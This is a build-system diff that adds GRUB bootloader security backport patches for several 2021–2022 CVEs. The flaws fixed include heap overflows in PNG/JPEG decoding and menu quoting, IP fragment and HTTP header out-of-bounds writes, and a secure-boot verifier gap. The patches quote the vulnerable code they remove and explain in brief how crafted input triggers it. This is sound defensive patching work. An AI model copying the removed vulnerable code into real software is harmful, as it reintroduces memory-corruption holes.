+Subject: commands/menuentry: Fix quoting in setparams_prefix()
+
+Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
+says that expressing a quoted single quote will require 3 characters. It
+actually requires (and always did require!) 4 characters:
+
+  str: a'b => a'\''b
+  len:  3  => 6 (2 for the letters + 4 for the quote)
+
+This leads to not allocating enough memory and thus out of bounds writes
+that have been observed to cause heap corruption.
+
+Allocate 4 bytes for each single quote.
+
+Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
+quoting, but it adds 3 as extra overhead on top of the single byte that
+the quote already needs. So it's correct.
+
+Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
+Fixes: CVE-2021-20233
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
+CVE: CVE-2021-20233
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/commands/menuentry.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
+index 9164df7..720e6d8 100644
+--- a/grub-core/commands/menuentry.c
++++ b/grub-core/commands/menuentry.c
+@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
+       len += 3; /* 3 = 1 space + 2 quotes */
+       p = args[i];
+       while (*p)
+-	len += (*p++ == '\'' ? 3 : 1);
++	len += (*p++ == '\'' ? 4 : 1);
+     }
+ 
+   result = grub_malloc (len + 2);
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3695.patch b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
new file mode 100644
index 0000000000..7d6e805725
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
+From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:01:35 +0530
+Subject: [PATCH] CVE-2021-3695
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
+CVE: CVE-2021-3695
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+ video/readers/png: Drop greyscale support to fix heap out-of-bounds write
+
+A 16-bit greyscale PNG without alpha is processed in the following loop:
+
+      for (i = 0; i < (data->image_width * data->image_height);
+   i++, d1 += 4, d2 += 2)
+{
+  d1[R3] = d2[1];
+  d1[G3] = d2[1];
+  d1[B3] = d2[1];
+}
+
+The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
+but there are only 3 bytes allocated for storage. This means that image
+data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
+out of every 4 following the end of the image.
+
+This has existed since greyscale support was added in 2013 in commit
+3ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
+
+Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
+and attempting to load it causes grub-emu to crash - I don't think this code
+has ever worked.
+
+Delete all PNG greyscale support.
+
+Fixes: CVE-2021-3695
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 89 ++++-------------------------------
+ 1 file changed, 8 insertions(+), 81 deletions(-)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 0157ff7..db4a9d4 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -100,7 +100,7 @@ struct grub_png_data
+ 
+   unsigned image_width, image_height;
+   int bpp, is_16bit;
+-  int raw_bytes, is_gray, is_alpha, is_palette;
++  int raw_bytes, is_alpha, is_palette;
+   int row_bytes, color_bits;
+   grub_uint8_t *image_data;
+ 
+@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
+     data->bpp = 3;
+   else
+     {
+-      data->is_gray = 1;
+-      data->bpp = 1;
++      return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++			 "png: color type not supported");
+     }
+ 
+   if ((color_bits != 8) && (color_bits != 16)
+       && (color_bits != 4
+-	  || !(data->is_gray || data->is_palette)))
++	  || !data->is_palette))
+     return grub_error (GRUB_ERR_BAD_FILE_TYPE,
+                        "png: bit depth must be 8 or 16");
+ 
+@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
+     }
+ 
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+-  if (data->is_16bit || data->is_gray || data->is_palette)
++  if (data->is_16bit || data->is_palette)
+ #endif
+     {
+       data->image_data = grub_calloc (data->image_height, data->row_bytes);
+@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
+       int shift;
+       int mask = (1 << data->color_bits) - 1;
+       unsigned j;
+-      if (data->is_gray)
+-	{
+-	  /* Generic formula is
+-	     (0xff * i) / ((1U << data->color_bits) - 1)
+-	     but for allowed bit depth of 1, 2 and for it's
+-	     equivalent to
+-	     (0xff / ((1U << data->color_bits) - 1)) * i
+-	     Precompute the multipliers to avoid division.
+-	  */
+-
+-	  const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
+-	  for (i = 0; i < (1U << data->color_bits); i++)
+-	    {
+-	      grub_uint8_t col = multipliers[data->color_bits] * i;
+-	      palette[i][0] = col;
+-	      palette[i][1] = col;
+-	      palette[i][2] = col;
+-	    }
+-	}
+-      else
+-	grub_memcpy (palette, data->palette, 3 << data->color_bits);
++
++      grub_memcpy (palette, data->palette, 3 << data->color_bits);
+       d1c = d1;
+       d2c = d2;
+       for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
+@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
+       return;
+     }
+   
+-  if (data->is_gray)
+-    {
+-      switch (data->bpp)
+-	{
+-	case 4:
+-	  /* 16-bit gray with alpha.  */
+-	  for (i = 0; i < (data->image_width * data->image_height);
+-	       i++, d1 += 4, d2 += 4)
+-	    {
+-	      d1[R4] = d2[3];
+-	      d1[G4] = d2[3];
+-	      d1[B4] = d2[3];
+-	      d1[A4] = d2[1];
+-	    }
+-	  break;
+-	case 2:
+-	  if (data->is_16bit)
+-	    /* 16-bit gray without alpha.  */
+-	    {
+-	      for (i = 0; i < (data->image_width * data->image_height);
+-		   i++, d1 += 4, d2 += 2)
+-		{
+-		  d1[R3] = d2[1];
+-		  d1[G3] = d2[1];
+-		  d1[B3] = d2[1];
+-		}
+-	    }
+-	  else
+-	    /* 8-bit gray with alpha.  */
+-	    {
+-	      for (i = 0; i < (data->image_width * data->image_height);
+-		   i++, d1 += 4, d2 += 2)
+-		{
+-		  d1[R4] = d2[1];
+-		  d1[G4] = d2[1];
+-		  d1[B4] = d2[1];
+-		  d1[A4] = d2[0];
+-		}
+-	    }
+-	  break;
+-	  /* 8-bit gray without alpha.  */
+-	case 1:
+-	  for (i = 0; i < (data->image_width * data->image_height);
+-	       i++, d1 += 3, d2++)
+-	    {
+-	      d1[R3] = d2[0];
+-	      d1[G3] = d2[0];
+-	      d1[B3] = d2[0];
+-	    }
+-	  break;
+-	}
+-      return;
+-    }
+-
+-    {
++  {
+   /* Only copy the upper 8 bit.  */
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+       for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3696.patch b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
new file mode 100644
index 0000000000..ef6da945c4
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
+From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:05:42 +0530
+Subject: [PATCH] CVE-2021-3696
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
+CVE: CVE-2021-3696
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/png: Avoid heap OOB R/W inserting huff table items
+
+In fuzzing we observed crashes where a code would attempt to be inserted
+into a huffman table before the start, leading to a set of heap OOB reads
+and writes as table entries with negative indices were shifted around and
+the new code written in.
+
+Catch the case where we would underflow the array and bail.
+
+Fixes: CVE-2021-3696
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 36b3f10..3c05951 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
+   for (i = len; i < ht->max_length; i++)
+     n += ht->maxval[i];
+ 
++  if (n > ht->num_values)
++    {
++      grub_error (GRUB_ERR_BAD_FILE_TYPE,
++		  "png: out of range inserting huffman table item");
++      return;
++    }
++
+   for (i = 0; i < n; i++)
+     ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3697.patch b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
new file mode 100644
index 0000000000..be15e7d1f2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
+From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 19 Jul 2022 11:13:02 +0530
+Subject: [PATCH] CVE-2021-3697
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
+CVE: CVE-2021-3697
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/jpeg: Block int underflow -> wild pointer write
+
+Certain 1 px wide images caused a wild pointer write in
+grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
+we have the following loop:
+
+for (; data->r1 < nr1 && (!data->dri || rst);
+     data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
+
+We did not check if vb * width >= hb * nc1.
+
+On a 64-bit platform, if that turns out to be negative, it will underflow,
+be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
+we see data->bitmap_ptr jump, e.g.:
+
+0x6180_0000_0480 to
+0x6181_0000_0498
+     ^
+     ~--- carry has occurred and this pointer is now far away from
+          any object.
+
+On a 32-bit platform, it will decrement the pointer, creating a pointer
+that won't crash but will overwrite random data.
+
+Catch the underflow and error out.
+
+Fixes: CVE-2021-3697
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/jpeg.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..545a60b 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -23,6 +23,7 @@
+ #include <grub/mm.h>
+ #include <grub/misc.h>
+ #include <grub/bufio.h>
++#include <grub/safemath.h>
+ 
+ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+@@ -617,6 +618,7 @@ static grub_err_t
+ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ {
+   unsigned c1, vb, hb, nr1, nc1;
++  unsigned stride_a, stride_b, stride;
+   int rst = data->dri;
+ 
+   vb = 8 << data->log_vs;
+@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+   nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
+   nc1 = (data->image_width + hb - 1)  >> (3 + data->log_hs);
+ 
++  if (grub_mul(vb, data->image_width, &stride_a) ||
++      grub_mul(hb, nc1, &stride_b) ||
++      grub_sub(stride_a, stride_b, &stride))
++    return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++		       "jpeg: cannot decode image with these dimensions");
++
+   for (; data->r1 < nr1 && (!data->dri || rst);
+-       data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
++       data->r1++, data->bitmap_ptr += stride * 3)
+     for (c1 = 0;  c1 < nc1 && (!data->dri || rst);
+ 	c1++, rst--, data->bitmap_ptr += hb * 3)
+       {
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3981.patch b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
new file mode 100644
index 0000000000..e27027ea65
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
+From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 27 Jun 2022 10:15:29 +0530
+Subject: [PATCH] CVE-2021-3981
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
+CVE: CVE-2021-3981
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ util/grub-mkconfig.in | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
+index 9f477ff..ead94a6 100644
+--- a/util/grub-mkconfig.in
++++ b/util/grub-mkconfig.in
+@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
+     exit 1
+   else
+     # none of the children aborted with error, install the new grub.cfg
+-    mv -f ${grub_cfg}.new ${grub_cfg}
++    oldumask=$(umask)
++    umask 077
++    cat ${grub_cfg}.new > ${grub_cfg}
++    umask $oldumask
++    rm -f ${grub_cfg}.new
+   fi
+ fi
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-2601.patch b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
new file mode 100644
index 0000000000..090f693be3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
+From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 01:58:27 +0800
+Subject: [PATCH] font: Fix several integer overflows in
+ grub_font_construct_glyph()
+
+This patch fixes several integer overflows in grub_font_construct_glyph().
+Glyphs of invalid size, zero or leading to an overflow, are rejected.
+The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
+returns NULL is fixed too.
+
+Fixes: CVE-2022-2601
+
+Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
+CVE: CVE-2022-2601
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index df17dba..f110db9 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+   struct grub_video_signed_rect bounds;
+   static struct grub_font_glyph *glyph = 0;
+   static grub_size_t max_glyph_size = 0;
++  grub_size_t cur_glyph_size;
+ 
+   ensure_comb_space (glyph_id);
+ 
+@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+   if (!glyph_id->ncomb && !glyph_id->attributes)
+     return main_glyph;
+ 
+-  if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
++  if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
++      grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
++    return main_glyph;
++
++  if (max_glyph_size < cur_glyph_size)
+     {
+       grub_free (glyph);
+-      max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
+-      if (max_glyph_size < 8)
+-	max_glyph_size = 8;
+-      glyph = grub_malloc (max_glyph_size);
++      if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
++	max_glyph_size = 0;
++      glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
+     }
+   if (!glyph)
+     {
++      max_glyph_size = 0;
+       grub_errno = GRUB_ERR_NONE;
+       return main_glyph;
+     }
+ 
+-  grub_memset (glyph, 0, sizeof (*glyph)
+-	       + (bounds.width * bounds.height
+-		  + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
++  grub_memset (glyph, 0, cur_glyph_size);
+ 
+   glyph->font = main_glyph->font;
+-  glyph->width = bounds.width;
+-  glyph->height = bounds.height;
+-  glyph->offset_x = bounds.x;
+-  glyph->offset_y = bounds.y;
++  if (bounds.width == 0 || bounds.height == 0 ||
++      grub_cast (bounds.width, &glyph->width) ||
++      grub_cast (bounds.height, &glyph->height) ||
++      grub_cast (bounds.x, &glyph->offset_x) ||
++      grub_cast (bounds.y, &glyph->offset_y))
++    return main_glyph;
+ 
+   if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
+     grub_font_blit_glyph_mirror (glyph, main_glyph,
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28733.patch b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
new file mode 100644
index 0000000000..6cfdf20e2d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
+From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:48:34 +0530
+Subject: [PATCH] CVE-2022-28733
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
+CVE: CVE-2022-28733
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/ip: Do IP fragment maths safely
+
+We can receive packets with invalid IP fragmentation information. This
+can lead to rsm->total_len underflowing and becoming very large.
+
+Then, in grub_netbuff_alloc(), we add to this very large number, which can
+cause it to overflow and wrap back around to a small positive number.
+The allocation then succeeds, but the resulting buffer is too small and
+subsequent operations can write past the end of the buffer.
+
+Catch the underflow here.
+
+Fixes: CVE-2022-28733
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/net/ip.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
+index ea5edf8..74e4e8b 100644
+--- a/grub-core/net/ip.c
++++ b/grub-core/net/ip.c
+@@ -25,6 +25,7 @@
+ #include <grub/net/netbuff.h>
+ #include <grub/mm.h>
+ #include <grub/priority_queue.h>
++#include <grub/safemath.h>
+ #include <grub/time.h>
+ 
+ struct iphdr {
+@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
+     {
+       rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
+ 			+ (nb->tail - nb->data));
+-      rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
++
++      if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
++		    &rsm->total_len))
++	{
++	  grub_dprintf ("net", "IP reassembly size underflow\n");
++	  return GRUB_ERR_NONE;
++	}
++
+       rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
+       if (!rsm->asm_netbuff)
+ 	{
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28734.patch b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
new file mode 100644
index 0000000000..577ec10bea
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
+From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:59:41 +0530
+Subject: [PATCH] CVE-2022-28734
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
+CVE: CVE-2022-28734
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http: Fix OOB write for split http headers
+
+GRUB has special code for handling an http header that is split
+across two packets.
+
+The code tracks the end of line by looking for a "\n" byte. The
+code for split headers has always advanced the pointer just past the
+end of the line, whereas the code that handles unsplit headers does
+not advance the pointer. This extra advance causes the length to be
+one greater, which breaks an assumption in parse_line(), leading to
+it writing a NUL byte one byte past the end of the buffer where we
+reconstruct the line from the two packets.
+
+It's conceivable that an attacker controlled set of packets could
+cause this to zero out the first byte of the "next" pointer of the
+grub_mm_region structure following the current_line buffer.
+
+Do not advance the pointer in the split header case.
+
+Fixes: CVE-2022-28734
+---
+ grub-core/net/http.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/net/http.c b/grub-core/net/http.c
+index 5aa4ad3..a220d21 100644
+--- a/grub-core/net/http.c
++++ b/grub-core/net/http.c
+@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
+   char *end = ptr + len;
+   while (end > ptr && *(end - 1) == '\r')
+     end--;
++
++  /* LF without CR. */
++  if (end == ptr + len)
++    {
++      data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
++      return GRUB_ERR_NONE;
++    }
+   *end = 0;
++
+   /* Trailing CRLF.  */
+   if (data->in_chunk_len == 1)
+     {
+@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
+ 	  int have_line = 1;
+ 	  char *t;
+ 	  ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
+-	  if (ptr)
+-	    ptr++;
+-	  else
++	  if (ptr == NULL)
+ 	    {
+ 	      have_line = 0;
+ 	      ptr = (char *) nb->tail;
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28735.patch b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
new file mode 100644
index 0000000000..89b653a8da
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
+From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Thu, 2 Dec 2021 15:03:53 +0100
+Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
+CVE: CVE-2022-28735
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+We must not allow other verifiers to pass things like the GRUB modules.
+Instead of maintaining a blocklist, maintain an allowlist of things
+that we do not care about.
+
+This allowlist really should be made reusable, and shared by the
+lockdown verifier, but this is the minimal patch addressing
+security concerns where the TPM verifier was able to mark modules
+as verified (or the OpenPGP verifier for that matter), when it
+should not do so on shim-powered secure boot systems.
+
+Fixes: CVE-2022-28735
+
+Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
+ include/grub/verify.h   |   1 +
+ 2 files changed, 222 insertions(+)
+ create mode 100644 grub-core/kern/efi/sb.c
+
+diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
+new file mode 100644
+index 0000000..89c4bb3
+--- /dev/null
++++ b/grub-core/kern/efi/sb.c
+@@ -0,0 +1,221 @@
++/*
++ *  GRUB  --  GRand Unified Bootloader
++ *  Copyright (C) 2020  Free Software Foundation, Inc.
++ *
++ *  GRUB is free software: you can redistribute it and/or modify
++ *  it under the terms of the GNU General Public License as published by
++ *  the Free Software Foundation, either version 3 of the License, or
++ *  (at your option) any later version.
++ *
++ *  GRUB is distributed in the hope that it will be useful,
++ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
++ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ *  GNU General Public License for more details.
++ *
++ *  You should have received a copy of the GNU General Public License
++ *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
++ *
++ *  UEFI Secure Boot related checkings.
++ */
++
++#include <grub/efi/efi.h>
++#include <grub/efi/pe32.h>
++#include <grub/efi/sb.h>
++#include <grub/env.h>
++#include <grub/err.h>
++#include <grub/file.h>
++#include <grub/i386/linux.h>
++#include <grub/kernel.h>
++#include <grub/mm.h>
++#include <grub/types.h>
++#include <grub/verify.h>
++
++static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
++
++/*
++ * Determine whether we're in secure boot mode.
++ *
++ * Please keep the logic in sync with the Linux kernel,
++ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
++ */
++grub_uint8_t
++grub_efi_get_secureboot (void)
++{
++  static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++  grub_efi_status_t status;
++  grub_efi_uint32_t attr = 0;
++  grub_size_t size = 0;
++  grub_uint8_t *secboot = NULL;
++  grub_uint8_t *setupmode = NULL;
++  grub_uint8_t *moksbstate = NULL;
++  grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
++  const char *secureboot_str = "UNKNOWN";
++
++  status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
++				  &size, (void **) &secboot);
++
++  if (status == GRUB_EFI_NOT_FOUND)
++    {
++      secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++      goto out;
++    }
++
++  if (status != GRUB_EFI_SUCCESS)
++    goto out;
++
++  status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
++				  &size, (void **) &setupmode);
++
++  if (status != GRUB_EFI_SUCCESS)
++    goto out;
++
++  if ((*secboot == 0) || (*setupmode == 1))
++    {
++      secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++      goto out;
++    }
++
++  /*
++   * See if a user has put the shim into insecure mode. If so, and if the
++   * variable doesn't have the runtime attribute set, we might as well
++   * honor that.
++   */
++  status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
++						  &size, (void **) &moksbstate, &attr);
++
++  /* If it fails, we don't care why. Default to secure. */
++  if (status != GRUB_EFI_SUCCESS)
++    {
++      secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++      goto out;
++    }
++
++  if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
++    {
++      secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++      goto out;
++    }
++
++  secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++
++ out:
++  grub_free (moksbstate);
++  grub_free (setupmode);
++  grub_free (secboot);
++
++  if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
++    secureboot_str = "Disabled";
++  else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++    secureboot_str = "Enabled";
++
++  grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
++
++  return secureboot;
++}
++
++static grub_err_t
++shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
++			 enum grub_file_type type,
++			 void **context __attribute__ ((unused)),
++			 enum grub_verify_flags *flags)
++{
++  *flags = GRUB_VERIFY_FLAGS_NONE;
++
++  switch (type & GRUB_FILE_TYPE_MASK)
++    {
++    /* Files we check. */
++    case GRUB_FILE_TYPE_LINUX_KERNEL:
++    case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++    case GRUB_FILE_TYPE_BSD_KERNEL:
++    case GRUB_FILE_TYPE_XNU_KERNEL:
++    case GRUB_FILE_TYPE_PLAN9_KERNEL:
++    case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++      *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
++      return GRUB_ERR_NONE;
++
++    /* Files that do not affect secureboot state. */
++    case GRUB_FILE_TYPE_NONE:
++    case GRUB_FILE_TYPE_LOOPBACK:
++    case GRUB_FILE_TYPE_LINUX_INITRD:
++    case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
